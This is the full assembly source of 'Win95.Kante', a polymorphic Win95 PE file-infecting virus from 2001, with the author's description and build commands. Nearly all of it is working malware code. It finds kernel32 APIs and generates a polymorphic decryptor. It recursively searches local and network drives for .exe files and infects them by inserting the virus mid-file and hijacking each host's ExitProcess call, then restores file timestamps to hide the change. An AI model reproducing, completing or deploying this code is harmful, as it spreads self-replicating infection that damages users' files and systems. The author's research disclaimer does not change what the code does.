comment ~ NAME: Win95.Kante AUTHOR: Black Jack [independant Austrian Win32asm virus coder] CONTACT: | TYPE: Win95 semi-resident light-poly PE midfile infector with EPO SIZE: 2016 bytes (+decryptor size) DESCRIPTION: The virus usually gains control when an infected file quits (this is due to its EPO feature). First the light-poly decryptor decrypts the virus body into a writeable section of the host and gives control to it. The virus then fully takes control of the hosts task, and starts scanning recursively for infect- able files on all drives and in all directories in the background. Files are infected by adding the virus body to the virtual end of one section (that can be somewhere in the middle of the file), if it fits in between there and the virtual start of the next section, the rest of the file is shifted back. This means that the physical size of the infected section is equal to its virtual size after infection, and they go up to the virtual start of the next section. Besides that a writeable section is searched and its RVA saved; the poly decryptor will decrypt the virus over there at runtime, thats why it is not necessary to modify the flags of any section. Before the file modification the victims code section was scanned for a JMP [imm32] or a CALL [imm32] to the ExitProcess API, this jmp/call will now be replaced with a jmp/call to the virus body. The virus uses no explicit infection marker, thats why multiple infections are possible, but each call to the ExitProcess API can be infected only once (and most HLL generated programs contain only one ExitProcess call), and also each section can only be infected once (and many sections can't be infected at all), that's why infected files won't grow infinitely. The virus body is also slightly polymorphic. The combination of not changing the section flags, EPO, midfile-infection and polymorphism should make the virus very hard to detect, I hope. POLY: First I have coded a quite neat poly engine for this virus. Then, when I wanted to add it, I found out that it would make this virus too big (the size of the virus body is limited to about 2 or 3 KB because of the midfile infection technique used). So I coded a very simple (and small) pseudo- poly engine for this virus. All it does is exchange the registers used in a static decryptor and add some basic junk opcodes, so it is basically a joke. But still I hope it will make detection at least a little more difficult combined with the other anti-detection techniques used in this virus. And, btw, my real poly engine will be used in my next creation, of course. COMMENTS: I lost interest in working on this virus any further, that's why I release it in this kinda unfinished form. It's unoptimised, partially uncommented and not tested enough, which means that there could be some bugs left. The main bug is that it won't work in WinNT, although it should theoretically, but I don't know why it doesn't, and really don't want to waste more time searching that silly bug, sorry. ASSEMBLE WITH: tasm32 /mx /m kante.asm tlink32 /Tpe /aa kante.obj,,, import32.lib there's no need for PEWRSEC or a similar tool, because the virus code is stored in the data section. DISCLAIMER: I do *NOT* support the spreading of viruses in the wild. Therefore, this source was only written for research and education. Please do not spread it. The author can't be hold responsible for what you decide to do with this source. ~ ; =========================================================================== workspace EQU 100000 virus_size EQU (virus_end - virus_start) size_mem_buffer EQU ((size main_data) + virus_size) Extrn MessageBoxA:Proc .386p .model flat .data virus_start: call next ; get the delta offset delta: loop_head dd ? mem_buffer dd ? db "Win95.Kante by Black Jack, Austria, 2001", 0 ; Kante is a great band from Germany. I named this virus in their honour, ; because around the same time I finished this virus, I saw them live, and ; it was a really wounderful performance. next: pop ebp sub ebp, (delta-virus_start) ; This method to get the kernel32 base address with the last SEH frame was ; described in an article in Top Device online some time ago. Unfortunately, ; I don't remember who the original author was, anyways full credits go to him mov eax, fs:[0] ; EAX=first SEH frame search_last_SEH: mov ebx, [eax] ; EBX=next SEH frame inc ebx ; EBX=-1 means we have reached ; the last SEH frame JZ found_last_SEH dec ebx xchg ebx, eax ; EAX=next SEH frame JMP search_last_SEH found_last_SEH: mov eax, [eax+4] ; EAX=last SEH handler ; (which is always in k32) search_MZ: cmp word ptr [eax], "ZM" ; is there an MZ header ? JE found_MZ not_found_MZ: dec eax ; scan downwards JMP search_MZ found_MZ: mov ebx, [eax+3Ch] ; EBX=new header RVA cmp ebx, 1024 ; is it small enough ? JNB not_found_MZ ; if not, scan on add ebx, eax ; EBX=PE header offset cmp dword ptr [ebx], "EP" ; is there a PE header ? JNE not_found_MZ ; if not, scan on mov ebx, [ebx+120] ; EBX=export table RVA add ebx, eax ; RVA->VA mov esi, [ebx+20h] ; ESI=AddressOfNames RVA add esi, eax ; RVA->VA search_GPA_loop: xchg eax, edi ; save EAX (kernel32 base) lodsd ; EAX=a API name RVA xchg eax, edi add edi, eax ; RVA->VA pusha ; save all registers lea esi, [ebp+n_GetProcAddress-virus_start] ; ESI="GetProcAddress" push dword ptr l_GetProcAddress ; ECX=length of API name pop ecx cld ; clear direction flag rep cmpsb ; compare the API names popa ; restore all registers JNE search_GPA_loop ; if not equal, search on found_gpa: sub esi, eax ; VA->RVA sub esi, [ebx+20h] ; subtract AddressOfNames shr esi, 1 ; ESI=((ESI/4)*2)-2 dec esi dec esi add esi, [ebx+24h] ; add AddressOfNameOrdinals movzx ecx, word ptr [eax+esi] ; ECX=API ordinal lea ecx, [ecx*4+eax] ; ECX=ordinal*4+k32 base add ecx, [ebx+1Ch] ; add AddressOfFunctions mov ecx, [ecx] ; ECX=API RVA add ecx, eax ; RVA->VA push eax ; save kernel32 handle push ecx ; save GetProcAddress VA lea ebx, [ebp+n_GlobalAlloc-virus_start]; EBX="GlobalAlloc" push ebx ; push API name offset push eax ; kernel32 handle CALL ecx ; call GetProcAddress push size_mem_buffer ; size to allocate push 0 ; flags CALL eax ; call GlobalAlloc pop dword ptr [eax.GetProcAddress] ; put GPA API in our buffer pop dword ptr [eax.kernel32] ; put k32 base in our buffer mov [ebp+mem_buffer-virus_start], eax ; save mem buffer offset ; ----- A BASIC POLY ENGINE ------------------------------------------------- mov esi, ebp ; ESI=virus start lea edi, [eax.poly_virus_body] ; EDI=poly destination buffer mov bl, -1 ; BL holds the register that ; will hold the imagebase in ; the decryptor mov cl, -1 ; CL holds the register that ; will hold the decryption ; loop counter mov dl, -1 ; DL holds the register that ; will be used to decrypt CALL get_register ; get a free register xchg eax, ebx ; save as imagebase register CALL get_register ; get a free register xchg eax, ecx ; save as counter register CALL get_register ; get a free register xchg eax, edx ; save as use regiser CALL add_junk ; add some junk instructions mov al, bl ; AL=base register or al, 0B8h ; mov reg32, imm32 stosb ; store instruction push edi ; save where to put imagebase stosd ; place for imagebase CALL add_junk ; add some junk instructions mov al, cl ; AL=counter register or al, 0B8h ; mov reg32, imm32 stosb ; store instruction mov eax, virus_size ; EAX=loop counter init value stosd ; store it CALL add_junk ; add some junk instructions mov [ebp+loop_head-virus_start], edi ; store the loop head CALL add_junk ; add some junk instructions xor eax, eax ; EAX=0 mov ah, dl ; AH=use register shl ah, 3 or ah, bl ; imagebase register or ax, 808Bh ; mov reg32, [reg32+imm32] stosw ; store instruction push edi ; save place of RVA (imm32) stosd ; store it CALL add_junk ; add some junk instructions mov al, 81h ; store decrypt instruction: stosb ; add reg32, imm32 mov al, 0C0h or al, dl stosb CALL get_random ; get a random crypt key push eax ; save it stosd ; and store it CALL add_junk ; add some junk instructions xor eax, eax mov ah, dl shl ah, 3 or ah, bl or ax, 8089h ; mov [reg32+imm32], reg32 stosw push edi stosd CALL add_junk ; add some junk instructions mov al, bl ; AL=imagebase register or al, 40h ; inc reg32 stosb stosb stosb stosb CALL add_junk ; add some junk instructions mov al, 48h ; DEC reg32 or al, cl ; decrement the counter reg stosb ; store instruction mov al, 75h ; JNZ opcode stosb mov eax, [ebp+loop_head-virus_start] sub eax, edi dec eax stosb CALL add_junk ; add some junk instructions mov al, 0E9h ; jmp near stosb push edi stosd ; ----- END OF POLY ENGINE -------------------------------------------------- mov eax, [ebp+mem_buffer-virus_start] ; EAX=memory buffer mov ecx, edi lea edx, [eax.poly_virus_body] sub ecx, edx mov [eax.decryptor_size], ecx pop dword ptr [eax.jmp_displacement_ptr] pop dword ptr [eax.write_section_RVA_ptr] pop edx pop dword ptr [eax.virus_RVA_ptr] pop dword ptr [eax.imagebase_ptr] xchg ebp, eax ; EAX=old delta offset ; EBP=memory buffer mov dword ptr [ebp.start_virusbody], eax ; save old delta offset push eax ; save old delta offset mov ecx, (virus_size/4) encrypt_loop: lodsd ; get a dword of plaintext sub eax, edx ; encrypt it stosd ; store encrypted dword LOOP encrypt_loop ; do the next dword mov ecx, edi ; ECX=end of poly virus body lea edx, [ebp.poly_virus_body] ; EDX=start of poly virus body sub ecx, edx ; ECX=poly virus body length mov [ebp.poly_virus_size], ecx ; store it pop eax ; EAX=old delta offset lea esi, [eax+other_API_names-virus_start] lea edi, [ebp.SetFileAttributesA] ; first regular API VA mov ecx, number_of_other_APIs ; number of APIs to scan for Get_APIs_loop: push ecx ; save number of APIs left push esi ; get this API address push dword ptr [ebp.kernel32] call dword ptr [ebp.GetProcAddress] stosd ; store API address search_next_API_name: ; search end of API name lodsb or al, al JNE search_next_API_name pop ecx ; restore number of APIs left LOOP Get_APIs_loop ; ----- START SCANNING ALL DRIVES ------------------------------------------- mov [], "\:C" ; start with C:\ drive scan_all_drives_loop: lea eax, [] ; EAX=ptr to drive name push eax ; push it for SetCurDirA push eax ; get type of this drive CALL [ebp.GetDriveTypeA] cmp eax, 3 ; fixed drive ? JE scan_drive ; if yes, infect it cmp eax, 4 ; remote/network drive? JE scan_drive ; if yes, infect it ; we can't infect this drive pop eax ; remove shit from stack JMP scan_next_drive ; try next drive scan_drive: CALL dword ptr [ebp.SetCurrentDirectoryA] ; go to root dir of this drv CALL rec_search ; and start scanning there scan_next_drive: inc byte ptr [] ; try next drive cmp byte ptr [], "Z" ; done all drives ? JNE scan_all_drives_loop ; if not, scan on JMP dword ptr [ebp.ExitProcess] ; quit task if all is done ; ----- INFECT CURRENT DIRECTORY -------------------------------------------- rec_search: lea eax, [ebp.FileAttributes] ; EAX=ptr to FindFileStructure push eax ; push it CALL filemask_next ; push pointer to "*.*", 0 db "*.*", 0 filemask_next: call [ebp+FindFirstFileA] ; find the first file inc eax ; -1 means error JZ error_exit dec eax ; restore search handle push eax ; save search handle search_loop: lea edi, [ebp.FileName] ; EDI=pointer to filename test dword ptr [ebp.FileAttributes], 10h ; is this file a directory ? JNZ directory push 5 ; sleep a while call [ebp.Sleep] xor eax, eax ; search for end of filename mov cl, 0FFh cld repne scasb mov eax, [edi-4] ; EAX=filename extension or eax, 202020h ; make lowercase cmp eax, "exe" ; is it a .EXE file ? JNE search_on call infect_file ; if yes, try to infect it JMP search_on ; if not, search next file directory: cmp byte ptr [edi], "." ; is it the "." or ".." dir ? JE search_on ; if yes, forget it push edi ; if not, change dir to there call [ebp.SetCurrentDirectoryA] call rec_search ; and search the files in ; there recursively push dword ptr ".." ; go back down in the tree push esp call [ebp.SetCurrentDirectoryA] pop eax ; remove the ".." from stack search_on: pop edx ; EDX=search handle push edx ; save it back to stack lea eax, [ebp.FileAttributes] ; EAX=ptr to FindFileStructure push eax push edx call [ebp.FindNextFileA] ; find next file or eax, eax ; zero means error JNZ search_loop ; if no error, search on call [ebp.FindClose] ; close the filesearch error_exit: RET db "Du bist schon berall gewesen", 0 db "Du hast die Berge und das Meer gesehen", 0 db "Die Menschen, Tiere und Maschinen", 0 db "Und du redest mit ihnen", 0 db "Es gibt unzhlige Geschichten, die ber dich im Umlauf sind", 0 db "An jedem Ort von dir berichten, so wie Bltter im Wind", 0 ; These are lyrics from the wounderful song "Live at the electric Avenue" by ; Kante. Its a song about a person (or a allegoric figure) that moves around ; the world, never staying for long in one place, leaving lots of rumours ; about him behind, existing more like a shadow or a ghost. ; Here the English translation: ; ; "You have already been everywhere ; You know the mountains and the see ; The people, animals and machines ; And you talk with them ; There is an uncountable number of stories that are around about you ; and tell about you in every place, just like leaves in the wind" ; ----- INFECT A FILE ------------------------------------------------------- infect_file: push 80h ; normal attributes lea eax, [ebp.FileName] push eax ; offset filename call [ebp.SetFileAttributesA] or eax, eax JZ quit_infect_error push 0 ; template file (shit) push 80h ; file attributes (normal) push 3 ; open existing push 0 ; security attributes (shit) push 0 ; do not share file push 0C0000000h ; read/write mode lea eax, [ebp.FileName] push eax ; offset filename call [ebp.CreateFileA] mov [ebp.filehandle], eax inc eax JZ restore_attributes mov eax, [ebp.FileSizeLow] add eax, workspace push 0 ; name file mapping obj (shit) push eax ; low dword of filesize push 0 ; high dword of filesize push 4 ; PAGE_READWRITE push 0 ; security attributes (shit) push dword ptr [ebp.filehandle] call [ebp.CreateFileMappingA] mov [ebp.maphandle], eax or eax, eax JZ close_file_error push 0 ; map the whole file push 0 ; low dword of fileoffset push 0 ; high dword of fileoffset push 2 ; read/write access push eax ; maphandle call [ebp.MapViewOfFile] mov [ebp.mapbase], eax or eax, eax JZ closefilemapping cmp word ptr [eax], "ZM" JNE abort_infection mov ebx, eax add ebx, dword ptr [eax+3Ch] cmp dword ptr [ebx], "EP" JNE abort_infection mov ecx, [ebx+34h] ; ImageBase mov edx, [ebp.imagebase_ptr] mov [edx], ecx ; store it in poly decryptor mov edx, ebx add edx, 18h ; fileheader size movzx ecx, word ptr [ebx+14h] ; optional header size add edx, ecx movzx ecx, word ptr [ebx+6] ; Number of sections pusha mov esi, dword ptr [ebx+80h] ; import table RVA call get_section find_kernel32_import_descriptor: mov eax, [esi+0Ch] ; dll name RVA or eax, eax ; already last import descr? JZ failure_exit_with_one_popa add eax, edi mov ecx, [eax] or ecx, 20202020h ; lowercase cmp ecx, "nrek" JNE search_next_import_descriptor mov ecx, [eax+4] or cx, 2020h cmp ecx, "23le" JE found_kernel32_import_descriptor search_next_import_descriptor: add esi, 14h JMP find_kernel32_import_descriptor found_kernel32_import_descriptor: mov eax, [esi] ; API names ptr array ptr or eax, eax JNZ kernel32_imports_ok mov eax, [esi+16] kernel32_imports_ok: add eax, edi xor ecx, ecx search_ExitProcess: pusha mov esi, [eax+ecx*4] or esi, esi JZ search_ExitProcess_failed inc esi inc esi add esi, edi mov edi, [ebp.start_virusbody] add edi, (n_ExitProcess - virus_start) mov ecx, l_ExitProcess cld rep cmpsb popa JE found_ExitProcess inc ecx JMP search_ExitProcess search_ExitProcess_failed: popa failure_exit_with_one_popa: popa JMP abort_infection found_ExitProcess: mov eax, [esi+10h] ; API RVAs array ptr lea eax, [eax+ecx*4] add eax, [ebx+34h] ; ImageBase mov [ebp.EPO_API_VA], eax popa pusha mov esi, dword ptr [ebx+28h] ; ESI=EntryRVA call get_section mov esi, dword ptr [edx+14h] ; PointerToRawData add esi, eax mov ecx, [edx+10h] ; SizeOfRawData sub ecx, 5 mov ebx, [ebp.EPO_API_VA] search_JMP_CALL_ExitProcess: cmp byte ptr [esi], 0FFh ; search for a possible API ; call opcode JNE searchon_JMP_CALL_ExitProcess cmp dword ptr [esi+2], ebx JNE searchon_JMP_CALL_ExitProcess cmp byte ptr [esi+1], 15h ; is there a CALL [imm32] ? JE found_CALL_ExitProcess cmp byte ptr [esi+1], 25h ; is there a JMP [imm32] ? JE found_JMP_ExitProcess searchon_JMP_CALL_ExitProcess: inc esi LOOP search_JMP_CALL_ExitProcess search_JMP_CALL_ExitProcess_failed: popa JMP abort_infection found_JMP_ExitProcess: mov byte ptr [ebp.epo_opcode], 0E9h ; jmp near JMP save_epo_address found_CALL_ExitProcess: mov byte ptr [ebp.epo_opcode], 0E8h ; call near save_epo_address: mov [ebp.epo_offset], esi sub esi, eax ; EAX=mapbase sub esi, [edx+14h] ; PointerToRawData add esi, [edx+0Ch] ; VirtualAddress mov [ebp.epo_RVA], esi popa pusha mov esi, [ebp.write_section_RVA_ptr] mov dword ptr [esi], 0 search_writeable_section_loop: test dword ptr [edx+24h], 080000000h ; is section writeable? JZ not_writeable cmp dword ptr [edx+8], virus_size ; VirtualSize of sect. n JB not_writeable ; section not big enough mov edi, dword ptr [edx+0Ch] ; VirtualAddress of sect. n mov [esi], edi ; save it not_writeable: add edx, 28h ; next section header LOOP search_writeable_section_loop cmp dword ptr [esi], 0 popa JE abort_infection dec ecx search_section_loop: mov edi, dword ptr [edx+28h+0Ch] ; VirtualAddress of sect. n+1 sub edi, dword ptr [edx+0Ch] ; VirtualAddress of sect. n push edi mov esi, dword ptr [edx+8] ; VirtualSize of sect. n or esi, esi JNZ VirtualSize_OK mov esi, dword ptr [edx+10h] ; SizeOfRawData of sect. n VirtualSize_OK: sub edi, esi cmp edi, [ebp.poly_virus_size] pop edi JAE found_section next_section: add edx, 28h ; next section header LOOP search_section_loop JMP abort_infection found_section: add esi, dword ptr [edx+0Ch] ; add VirtualAddr. of sect. n mov [ebp.virus_RVA], esi ; store virus-RVA mov esi, dword ptr [edx+14h] ; ESI=PointerToRawData sect n or esi, esi ; is it a BSS section ? JNZ not_BSS mov esi, dword ptr [edx-28h+14h] ; PointerToRawData of sect n-1 or esi, esi ; another BSS section ?! JZ abort_infection ; if yes, better not infect add esi, dword ptr [edx-28h+10h] ; SizeOfRawData of sect. n-1 mov dword ptr [edx+14h], esi ; Set new PointerToRawData not_BSS: push esi add esi, dword ptr [edx+8] ; old VirtualSize of sect. n add esi, eax mov [ebp.virus_offset], esi ; store virus-file-offset pop esi add esi, dword ptr [edx+10h] ; old Raw size of sect. n mov dword ptr [edx+8], edi ; set new VirtualSize sub edi, dword ptr [edx+10h] ; SizeOfRawData ; EDI=filesize increase push dword ptr [edx+8] ; VirtualSize pop dword ptr [edx+10h] ; SizeOfRawData pusha mov esi, [ebp.FileSizeLow] ; ESI=old filesize add edi, esi ; EDI=new filesize mov [ebp.FileSizeLow], edi find_non_BSS_section: add edx, 28h mov ecx, dword ptr [edx+14h] ; PointerToRawData sect n+1 JCXZ find_non_BSS_section neg ecx add ecx, esi add esi, eax add edi, eax dec esi dec edi std rep movsb popa correct_section_headers_loop: add edx, 28h ; next section header cmp dword ptr [edx+14h], 0 JE dont_correct_section_header add dword ptr [edx+14h], edi ; correct PointerToRawData dont_correct_section_header: LOOP correct_section_headers_loop mov ecx, edi ; ECX=filesize increase mov edi, esi add edi, eax xor eax, eax cld rep stosb mov edi, [ebp.epo_offset] ; where to place jmp to virus mov al, [ebp.epo_opcode] ; how to give control to virus stosb ; store the opcode mov eax, [ebp.virus_RVA] ; EAX=RVA of virus push eax ; save it sub eax, [ebp.epo_RVA] ; calculate jmp displacement sub eax, 5 ; length of jmp/call near stosd ; store it mov eax, [ebp.write_section_RVA_ptr] ; ptr to RVA of writeable sect mov eax, [eax] ; EAX=RVA of writeable section pop ecx ; ECX=RVA of virus mov edx, [ebp.virus_RVA_ptr] ; ptr to virusRVA in decryptor add ecx, [ebp.decryptor_size] ; ECX=start of encrypted virus mov [edx], ecx ; new virusRVA to decryptor mov edx, [ebp.jmp_displacement_ptr] ; EDX=ptr to jmp to decrypted ; virus in decryptor sub eax, ecx ; calculate jmp displacement mov [edx], eax ; set the new one lea esi, [ebp.poly_virus_body] ; ESI=poly virus body mov edi, [ebp.virus_offset] ; EDI=virus location in map mov ecx, [ebp.poly_virus_size] ; ECX=size of poly virus body rep movsb ; copy poly virus body to file already_infected: abort_infection: push dword ptr [ebp.mapbase] ; unmap file call [ebp.UnmapViewOfFile] closefilemapping: push dword ptr [ebp.maphandle] ; close mapping object call [ebp.CloseHandle] push 0 ; relative to start of file push 0 ; high dword ptr to file offs push dword ptr [ebp.FileSizeLow] push dword ptr [ebp.filehandle] call [ebp.SetFilePointer] ; set filepointer to new EOF push dword ptr [ebp.filehandle] ; truncate file at end call [ebp.SetEndOfFile] lea eax, [ebp.LastWriteTime] ; restore old filetimes push eax sub eax, 8 push eax sub eax, 8 push eax push dword ptr [ebp.filehandle] call [ebp.SetFileTime] close_file_error: push dword ptr [ebp.filehandle] ; close file call [ebp.CloseHandle] restore_attributes: push dword ptr [ebp.FileAttributes] ; restore old file attributes lea eax, [ebp.FileName] push eax ; offset filename call [ebp.SetFileAttributesA] quit_infect_error: RET ; ----- CONVERT RVA TO PHYSICAL OFFSET -------------------------------------- get_section: mov edi, dword ptr [edx+0Ch] ; EDI=VirtualAddress cmp edi, esi JA try_next_section add edi, dword ptr [edx+8] ; VirtualSize cmp edi, esi JA found_our_section try_next_section: add edx, 28h ; go to next section header JMP get_section found_our_section: mov edi, dword ptr [edx+14h] ; PointerToRawData sub edi, dword ptr [edx+0Ch] ; VirtualAddress add edi, eax ; EDI=difference RVA/offset in ; memmap for this section add esi, edi ; ESI=offset in memmap that ; corresponds to the given RVA RET ; ----- POLY ENGINE SUBROUTINES --------------------------------------------- _AX = 0 _CX = 1 _DX = 2 _BX = 3 _SP = 4 _BP = 5 _SI = 6 _DI = 7 add_junk: push eax ; save registers push ebx push ecx push edx push esi push ebp CALL get_random ; get a random number and eax, 11b ; random number from 0 to 3 inc eax ; random number from 1 to 4 cmp al, 4 JNE counter_ok dec eax ; random number from 1 to 3 counter_ok: xchg eax, esi ; ESI=counter for junk-opcodes add_junk_loop: mov al, 81h ; first byte of opcode stosb CALL get_random ; get a random number between and al, 7 ; 0C0h and 0F8h, all those shl al, 3 ; opcodes are arithmetic add al, 0C0h ; instructions of the form xchg eax, ebp ; op reg32, imm32 CALL get_register ; get a garbage register or eax, ebp stosb ; store the 2nd byte of opcode CALL get_random ; random imm32 stosd ; store dec esi ; decrease counter JNZ add_junk_loop ; repeat loop if counter != 0 pop ebp ; restore registers pop esi pop edx pop ecx pop ebx pop eax RET get_register: CALL get_random ; get a random number and al, 111b ; between 0 and 7 cmp al, bl ; avoid already used registers JE get_register cmp al, cl JE get_register cmp al, dl JE get_register cmp al, _SP ; avoid ESP (stack must not JE get_register ; me destroyed by decryptor) cmp al, _BP ; avoid EBP (some opcodes look JE get_register ; different for EBP) cmp al, _AX ; avoid EAX (because of the JE get_register ; optimised opcodes for EAX) RET get_random: in eax, 40h ; I know, I know, this is a RET ; privileged op-code in WinNT. ; But since the virus doesn't ; work there anyways, I use ; it because of convenience. ; so please note that this is ; not the main reason for ; WinNT incompatibility! n_GetProcAddress db "GetProcAddress", 0 l_GetProcAddress EQU ($ - n_GetProcAddress) n_GlobalAlloc db "GlobalAlloc", 0 other_API_names: n_SetFileAttributesA db "SetFileAttributesA", 0 n_CreateFileA db "CreateFileA", 0 n_GetFileTime db "GetFileTime", 0 n_SetFileTime db "SetFileTime", 0 n_GetFileSize db "GetFileSize", 0 n_CreateFileMappingA db "CreateFileMappingA", 0 n_MapViewOfFile db "MapViewOfFile", 0 n_UnmapViewOfFile db "UnmapViewOfFile", 0 n_SetFilePointer db "SetFilePointer", 0 n_SetEndOfFile db "SetEndOfFile", 0 n_CloseHandle db "CloseHandle", 0 n_GetDriveTypeA db "GetDriveTypeA", 0 n_SetCurrentDirectoryA db "SetCurrentDirectoryA", 0 n_FindFirstFileA db "FindFirstFileA", 0 n_FindNextFileA db "FindNextFileA", 0 n_FindClose db "FindClose", 0 n_Sleep db "Sleep", 0 n_ExitProcess db "ExitProcess", 0 l_ExitProcess EQU ($ - n_ExitProcess) number_of_other_APIs EQU 18 if ((($-virus_start) mod 4) NE 0) ; align 4 db (4-(($-virus_start) mod 4)) dup(0) endif virus_end: main_data struc SetFileAttributesA dd ? CreateFileA dd ? GetFileTime dd ? SetFileTime dd ? GetFileSize dd ? CreateFileMappingA dd ? MapViewOfFile dd ? UnmapViewOfFile dd ? SetFilePointer dd ? SetEndOfFile dd ? CloseHandle dd ? GetDriveTypeA dd ? SetCurrentDirectoryA dd ? FindFirstFileA dd ? FindNextFileA dd ? FindClose dd ? Sleep dd ? ExitProcess dd ? kernel32 dd ? GetProcAddress dd ? drive dd ? start_virusbody dd ? poly_virus_size dd ? decryptor_size dd ? filehandle dd ? maphandle dd ? mapbase dd ? virus_offset dd ? virus_RVA dd ? EPO_API_VA dd ? epo_offset dd ? epo_RVA dd ? epo_opcode db ? jmp_displacement_ptr dd ? write_section_RVA_ptr dd ? virus_RVA_ptr dd ? imagebase_ptr dd ? FileAttributes dd ? ; FindData structure CreationTime dq ? LastAccessTime dq ? LastWriteTime dq ? FileSizeHigh dd ? FileSizeLow dd ? wfd_reserved dq ? FileName db 260 dup(?) DosFileName db 14 dup(?) poly_virus_body db ? main_data ends .code first_gen_host: push 0 push offset first_gen_capt push offset first_gen_msg push 0 call MessageBoxA push 0 call virus_start first_gen_capt db "Win95.Kante by Black Jack", 0 first_gen_msg db "This is a first generation virus dropper", 0 end first_gen_host